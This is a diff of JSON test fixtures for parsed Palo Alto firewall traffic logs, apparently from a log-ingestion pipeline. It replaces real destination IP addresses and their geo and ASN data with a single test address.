"event", @@ -1653,27 +1667,29 @@ "destination": { "nat": { "port": 443, - "ip": "17.249.60.78" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 714, + "number": 4837, "organization": { - "name": "Apple Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 5469, - "ip": "17.249.60.78", + "ip": "175.16.199.1", "packets": 16 }, "rule": { @@ -1692,7 +1708,7 @@ "packets": 16, "ip": "192.168.15.207" }, - "message": "192.168.15.207,17.249.60.78,192.168.1.63,17.249.60.78,new_outbound_from_trust,,,apple-push-notifications,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,22662,1,55112,443,42021,443,0x400053,tcp,allow,9978,4509,5469,32,2018/11/30 15:58:59,593,computer-and-internet-info,0,32091122,0x0,192.168.0.0-192.168.255.255,United States,0,16,16,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,apple-push-notifications,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,22662,1,55112,443,42021,443,0x400053,tcp,allow,9978,4509,5469,32,2018/11/30 15:58:59,593,computer-and-internet-info,0,32091122,0x0,192.168.0.0-192.168.255.255,United States,0,16,16,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -1707,7 +1723,7 @@ "destination": { "nat": { "port": 443, - "ip": "17.249.60.78" + "ip": "175.16.199.1" } }, "endreason": "tcp-rst-from-client", @@ -1729,7 +1745,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:JuPhgq+FyomxcGW/tt851C0l4Hg=" + "community_id": "1:xz8JjcLh4ikGO6fWQgvBXZpuzII=" } }, "sequence_number": 32091122, @@ -1749,8 +1765,8 @@ ], "network": { "community_id": [ - "1:89DsXq0JlAcm8a60Q9a+OELsT0Y=", - "1:JuPhgq+FyomxcGW/tt851C0l4Hg=" + "1:DwQdRfeIqrUI2C1TANf6meOvOR0=", + "1:xz8JjcLh4ikGO6fWQgvBXZpuzII=" ], "transport": "tcp", "application": "apple-push-notifications", @@ -1790,14 +1806,14 @@ ], "ip": [ "192.168.15.207", - "17.249.60.78", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 593000000000, - "ingested": "2021-09-08T12:40:05.941820240Z", - "original": "Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,17.249.60.78,192.168.1.63,17.249.60.78,new_outbound_from_trust,,,apple-push-notifications,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,22662,1,55112,443,42021,443,0x400053,tcp,allow,9978,4509,5469,32,2018/11/30 15:58:59,593,computer-and-internet-info,0,32091122,0x0,192.168.0.0-192.168.255.255,United States,0,16,16,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031497500Z", + "original": "Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,apple-push-notifications,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,22662,1,55112,443,42021,443,0x400053,tcp,allow,9978,4509,5469,32,2018/11/30 15:58:59,593,computer-and-internet-info,0,32091122,0x0,192.168.0.0-192.168.255.255,United States,0,16,16,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:24.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -1820,27 +1836,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 224, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -1859,7 +1877,7 @@ "packets": 1, "ip": "192.168.15.207" }, - "message": "192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24161,1,57632,53,24377,53,0x400019,udp,allow,297,73,224,2,2018/11/30 16:08:52,0,any,0,32091123,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24161,1,57632,53,24377,53,0x400019,udp,allow,297,73,224,2,2018/11/30 16:08:52,0,any,0,32091123,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -1874,7 +1892,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -1896,7 +1914,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:rsDXUIQYGBC2VYTxep2/bVIc3Xs=" + "community_id": "1:MAu3UoFt7KzUWLymGuJkjMaPK9Q=" } }, "sequence_number": 32091123, @@ -1916,8 +1934,8 @@ ], "network": { "community_id": [ - "1:5lGtGtzRH+NHOqMOFVuXwxg5nCo=", - "1:rsDXUIQYGBC2VYTxep2/bVIc3Xs=" + "1:wSCOZL6w2h6wEM1XNXlcQojHrKI=", + "1:MAu3UoFt7KzUWLymGuJkjMaPK9Q=" ], "transport": "udp", "application": "dns", @@ -1957,14 +1975,14 @@ ], "ip": [ "192.168.15.207", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941827444Z", - "original": "Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24161,1,57632,53,24377,53,0x400019,udp,allow,297,73,224,2,2018/11/30 16:08:52,0,any,0,32091123,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031503Z", + "original": "Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24161,1,57632,53,24377,53,0x400019,udp,allow,297,73,224,2,2018/11/30 16:08:52,0,any,0,32091123,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:24.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -1987,27 +2005,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 117, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -2026,7 +2046,7 @@ "packets": 1, "ip": "192.168.15.207" }, - "message": "192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24107,1,50271,53,48792,53,0x400019,udp,allow,186,69,117,2,2018/11/30 16:08:52,0,any,0,32091124,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24107,1,50271,53,48792,53,0x400019,udp,allow,186,69,117,2,2018/11/30 16:08:52,0,any,0,32091124,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -2041,7 +2061,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -2063,7 +2083,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:ewaPydF3S4wOU8oEi8ykj+ETSIY=" + "community_id": "1:IbMAPI2u73wwPw/13/OGzLYogKE=" } }, "sequence_number": 32091124, @@ -2083,8 +2103,8 @@ ], "network": { "community_id": [ - "1:WbAIgVVT23pzqAJkSDF68HGSPY4=", - "1:ewaPydF3S4wOU8oEi8ykj+ETSIY=" + "1:difgeoigC1UX5MzBPcE93MzIaZA=", + "1:IbMAPI2u73wwPw/13/OGzLYogKE=" ], "transport": "udp", "application": "dns", @@ -2124,14 +2144,14 @@ ], "ip": [ "192.168.15.207", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941831528Z", - "original": "Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24107,1,50271,53,48792,53,0x400019,udp,allow,186,69,117,2,2018/11/30 16:08:52,0,any,0,32091124,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031508400Z", + "original": "Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24107,1,50271,53,48792,53,0x400019,udp,allow,186,69,117,2,2018/11/30 16:08:52,0,any,0,32091124,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:24.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -2154,27 +2174,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 307, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -2193,7 +2215,7 @@ "packets": 1, "ip": "192.168.15.207" }, - "message": "192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24063,1,54061,53,2987,53,0x400019,udp,allow,392,85,307,2,2018/11/30 16:08:52,0,any,0,32091125,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24063,1,54061,53,2987,53,0x400019,udp,allow,392,85,307,2,2018/11/30 16:08:52,0,any,0,32091125,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -2208,7 +2230,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -2230,7 +2252,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:+6FjOLCCWY+JDxSWKn7tYpAXksA=" + "community_id": "1:gyqXSPK4UfpIaavm5ElvzpaQJAs=" } }, "sequence_number": 32091125, @@ -2250,8 +2272,8 @@ ], "network": { "community_id": [ - "1:b+lWViOjpbOZConz3JzrSDR609Q=", - "1:+6FjOLCCWY+JDxSWKn7tYpAXksA=" + "1:rukFlCTeT6g0aD5WOkvZ1QaFQrQ=", + "1:gyqXSPK4UfpIaavm5ElvzpaQJAs=" ], "transport": "udp", "application": "dns", @@ -2291,14 +2313,14 @@ ], "ip": [ "192.168.15.207", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941835130Z", - "original": "Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24063,1,54061,53,2987,53,0x400019,udp,allow,392,85,307,2,2018/11/30 16:08:52,0,any,0,32091125,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031513800Z", + "original": "Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24063,1,54061,53,2987,53,0x400019,udp,allow,392,85,307,2,2018/11/30 16:08:52,0,any,0,32091125,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:24.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -2321,27 +2343,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 365, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -2360,7 +2384,7 @@ "packets": 1, "ip": "192.168.15.207" }, - "message": "192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24145,1,52701,53,6945,53,0x400019,udp,allow,440,75,365,2,2018/11/30 16:08:52,0,any,0,32091126,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24145,1,52701,53,6945,53,0x400019,udp,allow,440,75,365,2,2018/11/30 16:08:52,0,any,0,32091126,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -2375,7 +2399,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -2397,7 +2421,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:rR5F8eZHI1nwmznedxqG9e8vUQE=" + "community_id": "1:TG8yX3XeuNWXzsGRmRkB5EraqBM=" } }, "sequence_number": 32091126, @@ -2417,8 +2441,8 @@ ], "network": { "community_id": [ - "1:dnGaTG13rwIh66+Pj0GQSdJMhu8=", - "1:rR5F8eZHI1nwmznedxqG9e8vUQE=" + "1:DPokRa42hI+2E3a2DWdKPltL/Hs=", + "1:TG8yX3XeuNWXzsGRmRkB5EraqBM=" ], "transport": "udp", "application": "dns", @@ -2458,14 +2482,14 @@ ], "ip": [ "192.168.15.207", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941838611Z", - "original": "Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24145,1,52701,53,6945,53,0x400019,udp,allow,440,75,365,2,2018/11/30 16:08:52,0,any,0,32091126,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031519200Z", + "original": "Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24145,1,52701,53,6945,53,0x400019,udp,allow,440,75,365,2,2018/11/30 16:08:52,0,any,0,32091126,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:24.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -2488,27 +2512,29 @@ "destination": { "nat": { "port": 0, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 0, "bytes": 588, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 6 }, "rule": { @@ -2527,7 +2553,7 @@ "packets": 6, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:27,24245,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:13,0,any,0,32091127,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:27,24245,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:13,0,any,0,32091127,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -2542,7 +2568,7 @@ "destination": { "nat": { "port": 0, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -2616,14 +2642,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941842023Z", - "original": "Nov 30 16:09:28 PA-220 1,2018/11/30 16:09:27,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:27,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:27,24245,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:13,0,any,0,32091127,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031524600Z", + "original": "Nov 30 16:09:28 PA-220 1,2018/11/30 16:09:27,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:27,24245,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:13,0,any,0,32091127,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:27.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -2646,27 +2672,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 161, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -2685,7 +2713,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:27,24167,1,62503,53,42208,53,0x400019,udp,allow,258,97,161,2,2018/11/30 16:08:54,1,any,0,32091128,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:27,24167,1,62503,53,42208,53,0x400019,udp,allow,258,97,161,2,2018/11/30 16:08:54,1,any,0,32091128,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -2700,7 +2728,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -2722,7 +2750,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:81Mi4MwpmNYtUrc7CMJH0MPRelU=" + "community_id": "1:26TJuKDYd30VKSNqMturHXRN7aU=" } }, "sequence_number": 32091128, @@ -2742,8 +2770,8 @@ ], "network": { "community_id": [ - "1:Jof66SUOY3j4C+WrZwbgtKls1/Y=", - "1:81Mi4MwpmNYtUrc7CMJH0MPRelU=" + "1:LxppHna9qJmqS3k5notTeotpkFE=", + "1:26TJuKDYd30VKSNqMturHXRN7aU=" ], "transport": "udp", "application": "dns", @@ -2783,14 +2811,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 1000000000, - "ingested": "2021-09-08T12:40:05.941845586Z", - "original": "Nov 30 16:09:28 PA-220 1,2018/11/30 16:09:27,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:27,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:27,24167,1,62503,53,42208,53,0x400019,udp,allow,258,97,161,2,2018/11/30 16:08:54,1,any,0,32091128,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031530100Z", + "original": "Nov 30 16:09:28 PA-220 1,2018/11/30 16:09:27,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:27,24167,1,62503,53,42208,53,0x400019,udp,allow,258,97,161,2,2018/11/30 16:08:54,1,any,0,32091128,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:27.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -2813,27 +2841,29 @@ "destination": { "nat": { "port": 443, - "ip": "98.138.49.44" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 36646, + "number": 4837, "organization": { - "name": "Oath Holdings Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 7805, - "ip": "98.138.49.44", + "ip": "175.16.199.1", "packets": 13 }, "rule": { @@ -2852,7 +2882,7 @@ "packets": 14, "ip": "192.168.15.224" }, - "message": "192.168.15.224,98.138.49.44,192.168.1.63,98.138.49.44,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:28,24212,1,52442,443,14660,443,0x40001c,tcp,allow,9891,2086,7805,27,2018/11/30 16:08:54,17,web-advertisements,0,32091129,0x0,192.168.0.0-192.168.255.255,United States,0,14,13,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:28,24212,1,52442,443,14660,443,0x40001c,tcp,allow,9891,2086,7805,27,2018/11/30 16:08:54,17,web-advertisements,0,32091129,0x0,192.168.0.0-192.168.255.255,United States,0,14,13,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -2867,7 +2897,7 @@ "destination": { "nat": { "port": 443, - "ip": "98.138.49.44" + "ip": "175.16.199.1" } }, "endreason": "tcp-fin", @@ -2889,7 +2919,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:FfbVY/+5Mds7zDjSs5/Yfw5bxNQ=" + "community_id": "1:1fkY5RRVUI2gwig/WeMdrwk+rDY=" } }, "sequence_number": 32091129, @@ -2909,8 +2939,8 @@ ], 